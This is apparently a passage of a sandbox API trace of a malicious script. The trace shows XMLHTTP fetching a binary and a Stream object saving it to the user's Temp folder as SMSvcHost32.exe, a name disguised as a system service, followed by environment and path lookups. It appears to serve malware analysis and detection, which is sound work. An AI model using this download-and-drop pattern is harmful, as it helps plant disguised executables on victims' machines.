	[0057.432] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=20, rgBstrNames=0x1505fb9a6e0, cMaxNames=0x3, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a6e0*="WriteText", pcNames=0x184c18e018*=0x3) returned 0x0
	[0057.432] SysStringByteLen (bstr="WriteText") returned 0x12
	[0057.432] SysStringByteLen (bstr="WriteText") returned 0x12
	[0057.432] SysStringByteLen (bstr="Data") returned 0x8
	[0057.432] SysStringByteLen (bstr="Data") returned 0x8
	[0057.432] SysStringByteLen (bstr="Options") returned 0xe
	[0057.432] SysStringByteLen (bstr="Options") returned 0xe
	[0057.432] CoTaskMemFree (pv=0x1505fb9a6e0) 
	[0057.432] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.432] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x20, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.432] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97a90
	[0057.432] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=21, rgBstrNames=0x1505fc97a90, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97a90*="Cancel", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.432] SysStringByteLen (bstr="Cancel") returned 0xc
	[0057.432] SysStringByteLen (bstr="Cancel") returned 0xc
	[0057.432] CoTaskMemFree (pv=0x1505fc97a90) 
	[0057.432] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.506] CoGetContextToken (in: pToken=0x184c18db90 | out: pToken=0x184c18db90) returned 0x0
	[0057.506] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc60 | out: ppvObject=0x184c18dc60*=0x1505fbce220) returned 0x0
	[0057.506] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=10, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e398*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e380, pExcepInfo=0x184c18e340, puArgErr=0x184c18e338 | out: pDispParams=0x184c18e398*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e380*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e340*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e338*=0x0) returned 0x0
	[0057.508] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0057.510] CoGetContextToken (in: pToken=0x184c18df70 | out: pToken=0x184c18df70) returned 0x0
	[0057.510] CoGetContextToken (in: pToken=0x184c18de70 | out: pToken=0x184c18de70) returned 0x0
	[0057.510] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfd0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfa0 | out: ppvObject=0x184c18dfa0*=0x0) returned 0x80004002
	[0057.551] CoGetContextToken (in: pToken=0x184c18df10 | out: pToken=0x184c18df10) returned 0x0
	[0057.551] CoGetContextToken (in: pToken=0x184c18de10 | out: pToken=0x184c18de10) returned 0x0
	[0057.551] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df70*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df40 | out: ppvObject=0x184c18df40*=0x0) returned 0x80004002
	[0057.553] CoGetContextToken (in: pToken=0x184c18df50 | out: pToken=0x184c18df50) returned 0x0
	[0057.553] CoGetContextToken (in: pToken=0x184c18de50 | out: pToken=0x184c18de50) returned 0x0
	[0057.553] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfb0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df80 | out: ppvObject=0x184c18df80*=0x0) returned 0x80004002
	[0057.702] CoGetContextToken (in: pToken=0x184c18db50 | out: pToken=0x184c18db50) returned 0x0
	[0057.702] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc20 | out: ppvObject=0x184c18dc20*=0x1505fbce220) returned 0x0
	[0057.702] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=4, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x4, pDispParams=0x184c18e378*(rgvarg=([0]=0x184c18e360*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x184c18e340*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x184c18e348, pExcepInfo=0x184c18e300, puArgErr=0x184c18e2f8 | out: pDispParams=0x184c18e378*(rgvarg=([0]=0x184c18e360*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)), rgdispidNamedArgs=([0]=0x184c18e340*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x184c18e348*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e300*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e2f8*=0x0) returned 0x0
	[0057.702] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0057.702] CoGetContextToken (in: pToken=0x184c18dfa0 | out: pToken=0x184c18dfa0) returned 0x0
	[0057.702] CoGetContextToken (in: pToken=0x184c18dea0 | out: pToken=0x184c18dea0) returned 0x0
	[0057.702] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e000*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfd0 | out: ppvObject=0x184c18dfd0*=0x0) returned 0x80004002
	[0057.714] CoGetContextToken (in: pToken=0x184c18df30 | out: pToken=0x184c18df30) returned 0x0
	[0057.714] CoGetContextToken (in: pToken=0x184c18de30 | out: pToken=0x184c18de30) returned 0x0
	[0057.714] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18df90*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df60 | out: ppvObject=0x184c18df60*=0x0) returned 0x80004002
	[0057.714] CoGetContextToken (in: pToken=0x184c18df70 | out: pToken=0x184c18df70) returned 0x0
	[0057.714] CoGetContextToken (in: pToken=0x184c18de70 | out: pToken=0x184c18de70) returned 0x0
	[0057.714] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18dfd0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfa0 | out: ppvObject=0x184c18dfa0*=0x0) returned 0x80004002
	[0057.780] CoGetContextToken (in: pToken=0x184c18db30 | out: pToken=0x184c18db30) returned 0x0
	[0057.780] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc00 | out: ppvObject=0x184c18dc00*=0x150600057b0) returned 0x0
	[0057.780] XMLHTTP:IDispatch:Invoke (in: This=0x150600057b0, dispIdMember=11, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e338*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e320, pExcepInfo=0x184c18e2e0, puArgErr=0x184c18e2d8 | out: pDispParams=0x184c18e338*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e320*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x150607c0090*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x150607c00b0*, rgsabound=((cElements=0x3a400, lLbound=0))), varVal2=0x0), pExcepInfo=0x184c18e2e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e2d8*=0x0) returned 0x0
	[0057.786] SafeArrayGetVartype (in: psa=0x150607c0090, pvt=0x184c18de20 | out: pvt=0x184c18de20) returned 0x0
	[0057.788] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x2
	[0057.789] CoGetContextToken (in: pToken=0x184c18df60 | out: pToken=0x184c18df60) returned 0x0
	[0057.789] CoGetContextToken (in: pToken=0x184c18de60 | out: pToken=0x184c18de60) returned 0x0
	[0057.789] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfc0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df90 | out: ppvObject=0x184c18df90*=0x0) returned 0x80004002
	[0057.793] CoGetContextToken (in: pToken=0x184c18df10 | out: pToken=0x184c18df10) returned 0x0
	[0057.793] CoGetContextToken (in: pToken=0x184c18de10 | out: pToken=0x184c18de10) returned 0x0
	[0057.793] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df70*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df40 | out: ppvObject=0x184c18df40*=0x0) returned 0x80004002
	[0057.794] CoGetContextToken (in: pToken=0x184c18df50 | out: pToken=0x184c18df50) returned 0x0
	[0057.794] CoGetContextToken (in: pToken=0x184c18de50 | out: pToken=0x184c18de50) returned 0x0
	[0057.794] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfb0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df80 | out: ppvObject=0x184c18df80*=0x0) returned 0x80004002
	[0057.837] CoGetContextToken (in: pToken=0x184c18db50 | out: pToken=0x184c18db50) returned 0x0
	[0057.837] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc20 | out: ppvObject=0x184c18dc20*=0x1505fbce220) returned 0x0
	[0057.837] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x184c18de58 | out: ppsaOut=0x184c18de58) returned 0x0
	[0057.837] SafeArrayAllocData (psa=0x1505fc9abb0) returned 0x0
	[0057.838] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=13, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e370*(rgvarg=([0]=0x184c18e358*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1505fc9abb0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x150607c0080*, rgsabound=((cElements=0x3a400, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x184c18e340, pExcepInfo=0x184c18e300, puArgErr=0x184c18e2f8 | out: pDispParams=0x184c18e370*(rgvarg=([0]=0x184c18e358*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1505fc9abb0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x150607c0080*, rgsabound=((cElements=0x3a400, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x184c18e340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e300*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e2f8*=0x0) returned 0x0
	[0057.844] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0057.844] CoGetContextToken (in: pToken=0x184c18df70 | out: pToken=0x184c18df70) returned 0x0
	[0057.844] CoGetContextToken (in: pToken=0x184c18de70 | out: pToken=0x184c18de70) returned 0x0
	[0057.844] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfd0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfa0 | out: ppvObject=0x184c18dfa0*=0x0) returned 0x80004002
	[0057.855] CoGetContextToken (in: pToken=0x184c18df10 | out: pToken=0x184c18df10) returned 0x0
	[0057.855] CoGetContextToken (in: pToken=0x184c18de10 | out: pToken=0x184c18de10) returned 0x0
	[0057.855] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df70*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df40 | out: ppvObject=0x184c18df40*=0x0) returned 0x80004002
	[0057.855] CoGetContextToken (in: pToken=0x184c18df50 | out: pToken=0x184c18df50) returned 0x0
	[0057.855] CoGetContextToken (in: pToken=0x184c18de50 | out: pToken=0x184c18de50) returned 0x0
	[0057.855] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfb0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df80 | out: ppvObject=0x184c18df80*=0x0) returned 0x80004002
	[0057.945] CoGetContextToken (in: pToken=0x184c18db50 | out: pToken=0x184c18db50) returned 0x0
	[0057.946] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc20 | out: ppvObject=0x184c18dc20*=0x1505fbce220) returned 0x0
	[0057.946] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=3, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x4, pDispParams=0x184c18e378*(rgvarg=([0]=0x184c18e360*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x184c18e340*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x184c18e348, pExcepInfo=0x184c18e300, puArgErr=0x184c18e2f8 | out: pDispParams=0x184c18e378*(rgvarg=([0]=0x184c18e360*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x184c18e340*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x184c18e348*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e300*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e2f8*=0x0) returned 0x0
	[0057.946] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0057.946] CoGetContextToken (in: pToken=0x184c18df60 | out: pToken=0x184c18df60) returned 0x0
	[0057.946] CoGetContextToken (in: pToken=0x184c18de60 | out: pToken=0x184c18de60) returned 0x0
	[0057.946] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfc0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df90 | out: ppvObject=0x184c18df90*=0x0) returned 0x80004002
	[0057.950] CoGetContextToken (in: pToken=0x184c18df10 | out: pToken=0x184c18df10) returned 0x0
	[0057.950] CoGetContextToken (in: pToken=0x184c18de10 | out: pToken=0x184c18de10) returned 0x0
	[0057.950] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df70*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df40 | out: ppvObject=0x184c18df40*=0x0) returned 0x80004002
	[0057.950] CoGetContextToken (in: pToken=0x184c18df50 | out: pToken=0x184c18df50) returned 0x0
	[0057.950] CoGetContextToken (in: pToken=0x184c18de50 | out: pToken=0x184c18de50) returned 0x0
	[0057.950] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfb0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df80 | out: ppvObject=0x184c18df80*=0x0) returned 0x80004002
	[0058.045] CoGetContextToken (in: pToken=0x184c18db50 | out: pToken=0x184c18db50) returned 0x0
	[0058.045] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc20 | out: ppvObject=0x184c18dc20*=0x1505fbce220) returned 0x0
	[0058.045] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=17, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e370*(rgvarg=([0]=0x184c18e358*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x184c18e340, pExcepInfo=0x184c18e300, puArgErr=0x184c18e2f8 | out: pDispParams=0x184c18e370*(rgvarg=([0]=0x184c18e358*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x184c18e340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e300*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e2f8*=0x0) returned 0x0
	[0058.067] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0058.067] CoGetContextToken (in: pToken=0x184c18df80 | out: pToken=0x184c18df80) returned 0x0
	[0058.067] CoGetContextToken (in: pToken=0x184c18de80 | out: pToken=0x184c18de80) returned 0x0
	[0058.067] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfe0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfb0 | out: ppvObject=0x184c18dfb0*=0x0) returned 0x80004002
	[0058.076] CoGetContextToken (in: pToken=0x184c18df30 | out: pToken=0x184c18df30) returned 0x0
	[0058.076] CoGetContextToken (in: pToken=0x184c18de30 | out: pToken=0x184c18de30) returned 0x0
	[0058.076] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df90*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df60 | out: ppvObject=0x184c18df60*=0x0) returned 0x80004002
	[0058.077] CoGetContextToken (in: pToken=0x184c18df70 | out: pToken=0x184c18df70) returned 0x0
	[0058.077] CoGetContextToken (in: pToken=0x184c18de70 | out: pToken=0x184c18de70) returned 0x0
	[0058.077] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfd0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfa0 | out: ppvObject=0x184c18dfa0*=0x0) returned 0x80004002
	[0058.120] CoGetContextToken (in: pToken=0x184c18db90 | out: pToken=0x184c18db90) returned 0x0
	[0058.120] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc60 | out: ppvObject=0x184c18dc60*=0x1505fbce220) returned 0x0
	[0058.120] Stream:IDispatch:Invoke (in: This=0x1505fbce220, dispIdMember=11, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e398*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e380, pExcepInfo=0x184c18e340, puArgErr=0x184c18e338 | out: pDispParams=0x184c18e398*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e380*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e340*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e338*=0x0) returned 0x0
	[0058.121] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0058.121] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.121] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="\x1390\x147e\x7ffc") returned 0x0
	[0058.122] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.122] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdb210
	[0058.122] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1505fbdb210, nSize=0x10a | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0058.122] CoTaskMemFree (pv=0x1505fbdb210) 
	[0058.122] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdc970
	[0058.122] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1505fbdc970, nSize=0x10a | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0058.122] CoTaskMemFree (pv=0x1505fbdc970) 
	[0058.123] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9010
	[0058.123] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1505fbd9010, nSize=0x10a | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0058.123] CoTaskMemFree (pv=0x1505fbd9010) 
	[0058.123] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.123] GetCurrentDirectoryW (in: nBufferLength=0x10a, lpBuffer=0x1505fbd7f10 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0058.123] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.123] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0058.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.124] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
